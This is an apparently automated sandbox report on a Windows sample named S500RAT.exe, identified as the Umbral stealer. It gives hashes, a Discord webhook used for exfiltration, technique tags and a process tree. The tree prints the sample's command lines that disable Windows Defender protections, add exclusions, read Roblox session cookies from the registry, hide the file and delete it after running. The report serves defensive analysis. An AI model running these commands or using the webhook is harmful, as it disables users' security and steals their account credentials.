umbral | a5e929a6859512632ededb0d04f9b706fcc8568f828047fae99f2767f4f6c783

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
04-07-2024 08:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S500RAT.exe
Size

12.4MB
MD5

eca30bacd3085f447705c090cf780563
SHA1

86d0d579742aeae2bea804b065abfa9ebf02b952
SHA256

a5e929a6859512632ededb0d04f9b706fcc8568f828047fae99f2767f4f6c783
SHA512

9c6ca62412486459c36818756aeb694caa9c6520e3178534ce1e0c2017df78e8fe359ef9f2ee8faaa8791ebd1fea99edcb4c15315b7294e0366ab4f00d3107b3
SSDEEP

196608:PQb6doh5jCqj6dehxHTOf+Ce2XkuujHWRcQRO7F0p/GChj171pZqeYAtmk3BC:kionuqjtxVRA+BQQGprjbvqeYZwBC

Score

10^/10

umbral execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1241894578668306453/YE8mVIJLGG7vF4W-wKbO1sJc6Tx9XoUX9OTvB4fFiYWrALppn6EFkHHwMHAiSo-VJSAk

Signatures

Detect Umbral payload 10 IoCs

resource	yara_rule
behavioral1/files/0x000d000000012260-6.dat	family_umbral
behavioral1/memory/2312-8-0x0000000000FF0000-0x0000000001030000-memory.dmp	family_umbral
behavioral1/memory/2952-60-0x00000000012A0000-0x00000000012E0000-memory.dmp	family_umbral
behavioral1/memory/2504-146-0x00000000012E0000-0x0000000001320000-memory.dmp	family_umbral
behavioral1/memory/2336-191-0x00000000000E0000-0x0000000000120000-memory.dmp	family_umbral
behavioral1/memory/1152-235-0x0000000000FA0000-0x0000000000FE0000-memory.dmp	family_umbral
behavioral1/memory/2592-311-0x0000000000240000-0x0000000000280000-memory.dmp	family_umbral
behavioral1/memory/2148-347-0x0000000000F10000-0x0000000000F50000-memory.dmp	family_umbral
behavioral1/memory/956-383-0x0000000001340000-0x0000000001380000-memory.dmp	family_umbral
behavioral1/memory/1976-661-0x0000000000120000-0x0000000000160000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2236	powershell.exe
1412	powershell.exe
2656	powershell.exe
2292	powershell.exe
2652	powershell.exe
1852	powershell.exe
3016	powershell.exe
1588	powershell.exe
1256	powershell.exe
560	powershell.exe
1964	powershell.exe
2292	powershell.exe
3028	powershell.exe
1764	powershell.exe
2004	powershell.exe
1648	powershell.exe
2888	powershell.exe
2080	powershell.exe

Executes dropped EXE 59 IoCs

pid	Process
2312	2.exe
2496	2.exe
2992	2.exe
2952	2.exe
2668	2.exe
2812	2.exe
2624	2.exe
1616	2.exe
2504	2.exe
1152	2.exe
2336	2.exe
2864	2.exe
1152	2.exe
2384	2.exe
2824	2.exe
2012	2.exe
2172	2.exe
1912	2.exe
2592	2.exe
2856	2.exe
692	2.exe
2148	2.exe
1316	2.exe
1412	2.exe
1896	2.exe
956	2.exe
1316	2.exe
2076	2.exe
564	2.exe
2120	2.exe
3064	2.exe
760	2.exe
2384	2.exe
2464	2.exe
2632	2.exe
1156	2.exe
1900	2.exe
2760	2.exe
2872	2.exe
3028	2.exe
572	2.exe
1076	2.exe
2780	2.exe
2984	2.exe
2848	2.exe
1628	2.exe
1860	2.exe
1404	2.exe
1492	2.exe
1704	2.exe
1396	2.exe
2256	2.exe
1156	2.exe
2404	2.exe
848	2.exe
2440	2.exe
1784	2.exe
1976	2.exe
2288	2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs

Web Service

T1102

flow	ioc
16	discord.com
46	discord.com
59	discord.com
75	discord.com
8	discord.com
32	discord.com
54	discord.com
20	discord.com
24	discord.com
40	discord.com
63	discord.com
71	discord.com
7	discord.com
12	discord.com
28	discord.com
36	discord.com
50	discord.com
67	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
43	ip-api.com
56	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 18 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1108	wmic.exe
2252	wmic.exe
2080	wmic.exe
1248	wmic.exe
1972	wmic.exe
2364	wmic.exe
1988	wmic.exe
692	wmic.exe
2096	wmic.exe
2732	wmic.exe
2644	wmic.exe
1956	wmic.exe
760	wmic.exe
836	wmic.exe
1664	wmic.exe
348	wmic.exe
1288	wmic.exe
1920	wmic.exe

Runs ping.exe 1 TTPs 18 IoCs

Remote System Discovery

T1018

pid	Process
992	PING.EXE
2212	PING.EXE
2864	PING.EXE
836	PING.EXE
2724	PING.EXE
2664	PING.EXE
572	PING.EXE
2876	PING.EXE
552	PING.EXE
772	PING.EXE
2628	PING.EXE
1200	PING.EXE
856	PING.EXE
2236	PING.EXE
1488	PING.EXE
264	PING.EXE
2264	PING.EXE
1216	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2312	2.exe
3028	powershell.exe
3024	powershell.exe
112	powershell.exe
2772	powershell.exe
1400	powershell.exe
2952	2.exe
1764	powershell.exe
2964	powershell.exe
1960	powershell.exe
2068	powershell.exe
2856	powershell.exe
2812	2.exe
2004	powershell.exe
1844	powershell.exe
3012	powershell.exe
2692	powershell.exe
1996	powershell.exe
2504	2.exe
1256	powershell.exe
848	powershell.exe
1160	powershell.exe
528	powershell.exe
1224	powershell.exe
2336	2.exe
2236	powershell.exe
536	powershell.exe
2656	powershell.exe
2832	powershell.exe
2668	powershell.exe
1152	2.exe
1648	powershell.exe
1676	powershell.exe
3008	powershell.exe
1052	powershell.exe
2864	powershell.exe
2012	2.exe
1412	powershell.exe
1784	powershell.exe
2044	powershell.exe
2456	powershell.exe
1076	powershell.exe
2592	2.exe
2652	powershell.exe
1976	powershell.exe
2436	powershell.exe
1900	powershell.exe
2780	powershell.exe
2148	2.exe
2656	powershell.exe
1348	powershell.exe
520	powershell.exe
2260	powershell.exe
1740	powershell.exe
956	2.exe
1852	powershell.exe
2924	powershell.exe
1404	powershell.exe
2436	powershell.exe
1448	powershell.exe
2632	2.exe
3016	powershell.exe
2140	powershell.exe
2372	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2312	2.exe
Token: SeIncreaseQuotaPrivilege	2932	wmic.exe
Token: SeSecurityPrivilege	2932	wmic.exe
Token: SeTakeOwnershipPrivilege	2932	wmic.exe
Token: SeLoadDriverPrivilege	2932	wmic.exe
Token: SeSystemProfilePrivilege	2932	wmic.exe
Token: SeSystemtimePrivilege	2932	wmic.exe
Token: SeProfSingleProcessPrivilege	2932	wmic.exe
Token: SeIncBasePriorityPrivilege	2932	wmic.exe
Token: SeCreatePagefilePrivilege	2932	wmic.exe
Token: SeBackupPrivilege	2932	wmic.exe
Token: SeRestorePrivilege	2932	wmic.exe
Token: SeShutdownPrivilege	2932	wmic.exe
Token: SeDebugPrivilege	2932	wmic.exe
Token: SeSystemEnvironmentPrivilege	2932	wmic.exe
Token: SeRemoteShutdownPrivilege	2932	wmic.exe
Token: SeUndockPrivilege	2932	wmic.exe
Token: SeManageVolumePrivilege	2932	wmic.exe
Token: 33	2932	wmic.exe
Token: 34	2932	wmic.exe
Token: 35	2932	wmic.exe
Token: SeIncreaseQuotaPrivilege	2932	wmic.exe
Token: SeSecurityPrivilege	2932	wmic.exe
Token: SeTakeOwnershipPrivilege	2932	wmic.exe
Token: SeLoadDriverPrivilege	2932	wmic.exe
Token: SeSystemProfilePrivilege	2932	wmic.exe
Token: SeSystemtimePrivilege	2932	wmic.exe
Token: SeProfSingleProcessPrivilege	2932	wmic.exe
Token: SeIncBasePriorityPrivilege	2932	wmic.exe
Token: SeCreatePagefilePrivilege	2932	wmic.exe
Token: SeBackupPrivilege	2932	wmic.exe
Token: SeRestorePrivilege	2932	wmic.exe
Token: SeShutdownPrivilege	2932	wmic.exe
Token: SeDebugPrivilege	2932	wmic.exe
Token: SeSystemEnvironmentPrivilege	2932	wmic.exe
Token: SeRemoteShutdownPrivilege	2932	wmic.exe
Token: SeUndockPrivilege	2932	wmic.exe
Token: SeManageVolumePrivilege	2932	wmic.exe
Token: 33	2932	wmic.exe
Token: 34	2932	wmic.exe
Token: 35	2932	wmic.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeIncreaseQuotaPrivilege	3012	wmic.exe
Token: SeSecurityPrivilege	3012	wmic.exe
Token: SeTakeOwnershipPrivilege	3012	wmic.exe
Token: SeLoadDriverPrivilege	3012	wmic.exe
Token: SeSystemProfilePrivilege	3012	wmic.exe
Token: SeSystemtimePrivilege	3012	wmic.exe
Token: SeProfSingleProcessPrivilege	3012	wmic.exe
Token: SeIncBasePriorityPrivilege	3012	wmic.exe
Token: SeCreatePagefilePrivilege	3012	wmic.exe
Token: SeBackupPrivilege	3012	wmic.exe
Token: SeRestorePrivilege	3012	wmic.exe
Token: SeShutdownPrivilege	3012	wmic.exe
Token: SeDebugPrivilege	3012	wmic.exe
Token: SeSystemEnvironmentPrivilege	3012	wmic.exe
Token: SeRemoteShutdownPrivilege	3012	wmic.exe
Token: SeUndockPrivilege	3012	wmic.exe
Token: SeManageVolumePrivilege	3012	wmic.exe
Token: 33	3012	wmic.exe
Token: 34	3012	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2392 wrote to memory of 2312	2392	S500RAT.exe	28
PID 2392 wrote to memory of 2312	2392	S500RAT.exe	28
PID 2392 wrote to memory of 2312	2392	S500RAT.exe	28
PID 2392 wrote to memory of 2568	2392	S500RAT.exe	29
PID 2392 wrote to memory of 2568	2392	S500RAT.exe	29
PID 2392 wrote to memory of 2568	2392	S500RAT.exe	29
PID 2312 wrote to memory of 2932	2312	2.exe	30
PID 2312 wrote to memory of 2932	2312	2.exe	30
PID 2312 wrote to memory of 2932	2312	2.exe	30
PID 2312 wrote to memory of 2788	2312	2.exe	33
PID 2312 wrote to memory of 2788	2312	2.exe	33
PID 2312 wrote to memory of 2788	2312	2.exe	33
PID 2312 wrote to memory of 3028	2312	2.exe	35
PID 2312 wrote to memory of 3028	2312	2.exe	35
PID 2312 wrote to memory of 3028	2312	2.exe	35
PID 2568 wrote to memory of 2496	2568	S500RAT.exe	37
PID 2568 wrote to memory of 2496	2568	S500RAT.exe	37
PID 2568 wrote to memory of 2496	2568	S500RAT.exe	37
PID 2568 wrote to memory of 3000	2568	S500RAT.exe	38
PID 2568 wrote to memory of 3000	2568	S500RAT.exe	38
PID 2568 wrote to memory of 3000	2568	S500RAT.exe	38
PID 2312 wrote to memory of 3024	2312	2.exe	39
PID 2312 wrote to memory of 3024	2312	2.exe	39
PID 2312 wrote to memory of 3024	2312	2.exe	39
PID 2312 wrote to memory of 112	2312	2.exe	41
PID 2312 wrote to memory of 112	2312	2.exe	41
PID 2312 wrote to memory of 112	2312	2.exe	41
PID 2312 wrote to memory of 2772	2312	2.exe	43
PID 2312 wrote to memory of 2772	2312	2.exe	43
PID 2312 wrote to memory of 2772	2312	2.exe	43
PID 3000 wrote to memory of 2992	3000	S500RAT.exe	45
PID 3000 wrote to memory of 2992	3000	S500RAT.exe	45
PID 3000 wrote to memory of 2992	3000	S500RAT.exe	45
PID 2312 wrote to memory of 3012	2312	2.exe	46
PID 2312 wrote to memory of 3012	2312	2.exe	46
PID 2312 wrote to memory of 3012	2312	2.exe	46
PID 3000 wrote to memory of 1984	3000	S500RAT.exe	48
PID 3000 wrote to memory of 1984	3000	S500RAT.exe	48
PID 3000 wrote to memory of 1984	3000	S500RAT.exe	48
PID 2312 wrote to memory of 2424	2312	2.exe	49
PID 2312 wrote to memory of 2424	2312	2.exe	49
PID 2312 wrote to memory of 2424	2312	2.exe	49
PID 2312 wrote to memory of 576	2312	2.exe	51
PID 2312 wrote to memory of 576	2312	2.exe	51
PID 2312 wrote to memory of 576	2312	2.exe	51
PID 2312 wrote to memory of 1400	2312	2.exe	53
PID 2312 wrote to memory of 1400	2312	2.exe	53
PID 2312 wrote to memory of 1400	2312	2.exe	53
PID 2312 wrote to memory of 1108	2312	2.exe	55
PID 2312 wrote to memory of 1108	2312	2.exe	55
PID 2312 wrote to memory of 1108	2312	2.exe	55
PID 2312 wrote to memory of 2220	2312	2.exe	57
PID 2312 wrote to memory of 2220	2312	2.exe	57
PID 2312 wrote to memory of 2220	2312	2.exe	57
PID 2220 wrote to memory of 836	2220	cmd.exe	59
PID 2220 wrote to memory of 836	2220	cmd.exe	59
PID 2220 wrote to memory of 836	2220	cmd.exe	59
PID 1984 wrote to memory of 2952	1984	S500RAT.exe	60
PID 1984 wrote to memory of 2952	1984	S500RAT.exe	60
PID 1984 wrote to memory of 2952	1984	S500RAT.exe	60
PID 1984 wrote to memory of 2428	1984	S500RAT.exe	61
PID 1984 wrote to memory of 2428	1984	S500RAT.exe	61
PID 1984 wrote to memory of 2428	1984	S500RAT.exe	61
PID 2952 wrote to memory of 1616	2952	2.exe	62

Views/modifies file attributes 1 TTPs 18 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2788	attrib.exe
1640	attrib.exe
2568	attrib.exe
808	attrib.exe
2136	attrib.exe
2084	attrib.exe
2808	attrib.exe
1576	attrib.exe
2404	attrib.exe
2524	attrib.exe
3000	attrib.exe
112	attrib.exe
2644	attrib.exe
2072	attrib.exe
2584	attrib.exe
2724	attrib.exe
2700	attrib.exe
1948	attrib.exe

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2392
- C:\Users\Admin\AppData\Local\Temp\2.exe
  "C:\Users\Admin\AppData\Local\Temp\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2312
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Views/modifies file attributes
    PID:2788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2424
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1400
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1108
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:836
- C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    PID:2496
- - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
    "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Users\Admin\AppData\Local\Temp\2.exe
      "C:\Users\Admin\AppData\Local\Temp\2.exe"
      4⤵
      Executes dropped EXE
      PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
      "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1984
    - - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2952
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:1616
      - C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        6⤵
        Views/modifies file attributes
        
        PID:2084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2964
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2068
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:2492
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:2196
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:2744
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2856
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2364
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        6⤵
        
        PID:2544
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:2876
    - - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        5⤵
        
        PID:2428
      - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        6⤵
        Executes dropped EXE
        
        PID:2668
      - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        6⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:2896
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        8⤵
        Views/modifies file attributes
        
        PID:1640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        8⤵
        
        PID:1156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        8⤵
        
        PID:2560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:1856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1996
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:836
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        8⤵
        
        PID:2788
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        9⤵
        Runs ping.exe
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        7⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        8⤵
        Executes dropped EXE
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        8⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        9⤵
        Executes dropped EXE
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        9⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2816
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        11⤵
        Views/modifies file attributes
        
        PID:2524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:528
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:2844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:2896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1224
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:1988
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        11⤵
        
        PID:2052
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        Runs ping.exe
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        10⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        11⤵
        Executes dropped EXE
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        11⤵
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        12⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:1924
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        13⤵
        Views/modifies file attributes
        
        PID:2072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        13⤵
